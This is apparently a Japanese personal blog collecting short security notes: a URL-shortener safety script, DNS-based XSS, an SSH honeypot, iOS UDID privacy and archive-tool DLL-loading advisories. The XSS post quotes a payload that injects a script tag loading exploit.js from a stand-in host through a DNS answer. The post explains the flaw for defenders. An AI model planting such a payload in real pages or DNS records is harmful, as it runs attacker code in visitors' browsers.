Kraftwerk

DebianのaptリポジトリにもApache Killer対策のパッチ適用がありましたね。
cron-apt入れてたので自動的に適用されてました。

最近めちゃくちゃ忙しくて大変ですが、忙しい分充実してるし、時間を自分でつくりながら生活出来てる気がします。

今が大事な時期。がんばらないと＞＜

名古屋大学のネットワーク脆弱性を指摘したけど、レスポンス一切無い。大学の情報セキュリティ窓口に報告したのに。

たいていセキュリティ関連の指摘を行うと、レスポンス帰ってこない。見なかったことにされる。これじゃ意味ないのにね。

昨晩の「hugeurl.js」はWebサイト側が自サイトをセキュアにするためのものでした。hugeurl.jsをベースに、今度は閲覧者側が短縮URLをセキュアに展開するためのChrome ExtensionとUserScriptを作りました。

下記URLよりダウンロードできます。

Chrome Extensions : ux.nu hugeurl.user.js
UserScript: http://ux.nu/js/hugeurl.user.js

テストはこちらから。

危険なリンクテスト
http://tobeto.be/SF
リンクをクリックすることで試せます。

ux.nuのhugeurlは短縮URLを展開し、セキュリティ評価をしてくれるAPIです。
今回はhugeurlを使って、HTML上の短縮URLを自動的にセキュリティチェック・展開するjavascriptをひなたくんに書いてもらいました。

使い方は、HTMLのHEAD内に

<script src=”http://ux.nu/js/hugeurl.js” type=”text/javascript” charset=”UTF-8″></script>

を入れるだけ。そうすることで自動的に短縮URLをチェックできます。また、危険なURLのリンクを踏んでしまった場合も、警告ダイアログが表示されます。

—例—

—

皆さんも使ってみてください。またフィードバックをお願いします。

*IEで、警告ダイアログをキャンセルしてもジャンプしてしまう不具合があります。本日中に調整予定…解決済

これ普段から考えてたんだけど、やっぱり対策されていない事が多いのか。

先日、なかなか強烈なXSS攻撃手法が公開されていました。 DNSへの問い合わせ結果にJavaScriptを埋め込んでしまおうというものです。

SkullSecurity: Stuffing Javascript into DNS names

DarkReading: Researcher Details New Class Of Cross-Site Scripting Attack

nCircle: Meta-Information Cross Site Scripting (PDF)

自動生成されるWebページ中に、DNSによる名前解決結果がエスケープされない状態で含まれていると、JavaScriptが実行されてしまうという仕掛けです。

「hogehoge.example.com」が本来ならば「198.1.100.3」というようなIPアドレスが結果として返るところを、DNSに細工を行って以下のように返るようにします(/*\032*/はスペースの代わり。単に「/」でも可能。)。

<script/*\032*/src="http://nosuchdomainc-hoge.com/exploit.js"></script>

本来であればIPアドレスが表示されるところにscriptタグが入ることで、それをそのまま表示してしまうWebページ上で外部のJavaScriptが実行されるようになってしまいます。 たとえば、DNSによる名前解決結果をそのままWebに表示するようなCGIなどが影響を受けます。

引用元: Geekなぺーじ : メタ情報によるXSS.

面白い！SSHハニポ＞＜

今回題材とするのは「Kojoney」という、Pythonで書かれた、SSH（Secure SHell）サーバをエミュレートするハニーポットである。

Kojoneyという名前の由来は、「cojon」というスペイン語と「honey」を掛け合わせた造語であるらしい。「estar hasta los cojones」（うんざりする、飽き飽きする）といった言い回しにも用いられるようで、作者は、自身のSSHサーバへのアタックに飽き飽きしてこのハニーポットを作成、公開したようである。

Kojoneyは、ユーザー名とパスワードをペアで管理しており、そのペアに合致したSSHアクセスに対してログインが成功したように見せかける。

だが、単にログインが成功したように見せかけるだけでは、あまり意味はない。Kojoneyはログインの際に使用されたユーザー名、パスワード、アクセス元のアドレスなどのログをすべて保存するよう設計されている。ログイン後も、ユーザーが実行したコマンドをログに保存する機能まで有している。

引用元: リアリティはないけど、脅威は確かにいるよ － ＠IT.

先日、Androidアプリの多くが個人情報を無断送信しているという、セキュリティリスクを内在していることを紹介したが(リンク:マイコミジャーナル)、こんどはiPhoneを含むiOSプラットフォーム上で同様の問題を含む可能性が存在することが、あるセキュリティ専門家の指摘によって指摘されている。

米ペンシルバニア州ルイスバーグにあるバックネル大学(Bucknell University)でネットワーク管理者を担当しているEric Smith氏が10月1日(現地時間)に発表した論文 (PDFファイル)によれば、iOSデバイスには個々を識別するための端末番号と呼べるUDID (Unique Device Identifier)が付与されており、iOSアプリがこれを自由に読み取り、バックエンドのサーバへ送受信可能な状態になっているという。もともとiOSではGPSデータやUDIDの利用が可能になっており、iOS SDKの規約が許す範囲で運用が可能になっている(例えばiOS SDKの規約では広告ネットワークの構築でこれらデータの利用を許している)。

引用元: iPhoneの個体識別番号にセキュリティ上のリスクは? – 専門家が指摘 | iPhone | iPad*iPhone Fan.

Lhaplus は、複数の圧縮ファイル形式に対応した圧縮・展開を行うソフトウェアです。Lhaplus は圧縮ファイルを展開する際に、特定の DLL を読み込みます。Lhaplus には、DLL を読み込む際の DLL 検索パスに問題があり、意図しない DLL を読み込んでしまう脆弱性が存在します。

プログラムを実行している権限で、任意のコードを実行される可能性があります。

引用元: JVN#82752978: Lhaplus における DLL 読み込みに関する脆弱性.

Lhasa は、LZH および ZIP 形式で圧縮されたファイルの展開を行うソフトウェアです。Lhasa は圧縮ファイルを展開する際に、特定の実行ファイルを読み込みます。Lhasa には、実行ファイルを読み込む際のファイル検索パスに問題があり、意図しない実行ファイルを読み込んでしまう脆弱性が存在します。

プログラムを実行している権限で、任意のコードを実行される可能性があります。

引用元: JVN#88850043: Lhasa における実行ファイル読み込みに関する脆弱性.